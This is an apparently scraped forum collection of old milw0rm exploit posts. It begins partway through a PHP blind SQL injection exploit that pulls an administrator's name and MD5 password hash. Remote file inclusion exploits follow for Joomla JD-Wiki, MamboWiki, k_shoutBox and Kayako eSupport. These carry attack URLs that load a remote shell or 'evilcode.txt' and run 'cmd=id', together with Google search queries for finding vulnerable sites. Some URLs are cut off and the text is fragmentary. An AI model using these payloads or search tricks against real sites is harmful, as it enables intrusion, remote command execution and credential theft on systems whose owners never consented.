{ for ($i=0; $i<=255; $i++) { $sql="(SELECT(IF((ASCII(SUBSTRING(uname,$j,1))=".$i."),msg_time,subject)) FROM/**/".$prefix."users/**/WHERE/**/rank=7/**/and/**/level=5)/**/ASC/**/ LIMIT/**/1/*"; echo "sql -> ".$sql."\r\n"; $sql=urlencode($sql); $packet ="GET ".$p."modules/messages/index.php?sort=$sql&by=suntzu HTTP/1.0\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (!strstr($html,"111111111111111111111111")){$my_admin.=chr($i);echo "admin -> ".$my_admin."[???]\n";sleep(1);break;} if ($i==255) {die("Exploit failed ");} } $j++; } echo " \n"; echo "admin -> ".$my_admin."\n"; echo "password (md5) -> ".$my_password."\n"; echo " \n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($my_password)) {echo "Exploit succeeded ";} else {echo "Exploit failed ";} ?> black_hat_cr(HCE) Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability Code: ################################################################## ################## #JD-Wiki Remote File Include JD-Wiki is the Joomla! integration of the nice DokuWiki. DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating documentation of any kind. #Bug Found by: jank0 #greetz: hackbsd crew #risk: dangerous ##this bug allows a remote atacker to execute commands via rfi path: ?mosConfig_absolute_path= xpl: /components/com_jd- wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell Contact: irc.undernet.org #hackbsd & #ircmasters # milw0rm.com [2006-08-07] vns3curity(HCE) Joomla MamboWiki Component <= 0.9.4 Remote File Inclusion Vulnerability Tìm kiếm những site bị bug này với google: Code: inurl:"com_mambowiki" file bị dzinh bug: MamboLogin.php Xploit: Code: http://[sitepath]/[joomlapath]/components/com_mambowiki/MamboLogin.php?IP= http://huh? black_hat_cr(HCE) k_shoutBox <= 4.4 Remote File Inclusion Vulnerability Code: >>> Kurdish Security >>> ShoutBox Remote Command Execution >>> Freedom For Ocalan >>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com >>> Rish : High >>> Class : Remote >>> Script : ShoutBox >>> Site : http://www.knusperleicht.at Code : //********************************************************** // INCLUDE PATH define('SB_INCLUDE_PATH', $sb_include_path); // INCLUDE PATH //********************************************************** include SB_INCLUDE_PATH.'inc/config.inc.php'; require_once SB_INCLUDE_PATH.'lang/'.SB_LANGUAGE.'/'.SB_LANGUAGE.'.lang.inc.php '; require_once SB_INCLUDE_PATH.'inc/Sb_template.php'; require_once SB_INCLUDE_PATH.'inc/Sb_bbcode.php'; require_once SB_INCLUDE_PATH.'inc/Sb_stuff.php'; require_once SB_INCLUDE_PATH.'inc/Sb_database.php'; if(SB_INCLUDE_PATH == "") { http://www.site.com/[path]/sb/index.php?sb_include_path=http://[site]/evilcode.txt ?&cmd=id # milw0rm.com [2006-08-01] vns3curity(HCE) Kayako eSupport <= 2.3.1 (subd) Remote File Inclusion Vulnerability Code: Script: Kayako eSupport <= 2.3.1 Vendor: Kayako (www.kayako.com) Discovered: beford <xbefordx gmail com> Comments: It seems like the vendor silently fixed the issue in the current version (more like since v2.3.5) withouth warning users of previous versions, noobs. Requires that "register_globals" is enabled. Vulnerable File: esupport/admin/autoclose.php Code: require_once $subd . "functions.php"; Not-leet-enough: "Powered By Kayako eSupport" http://www.google.com/search?q=%22He port+v2.3.1%22 http://www.google.com/search?q=%22He upport+v2.2%22 POC: http://omghax.com/esupport/admin/aut //remotefile/? # milw0rm.com [2006-08-02] vns3curity(HCE) . >>> Freedom For Ocalan >>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com >>> Rish : High >>> Class : Remote >>> Script :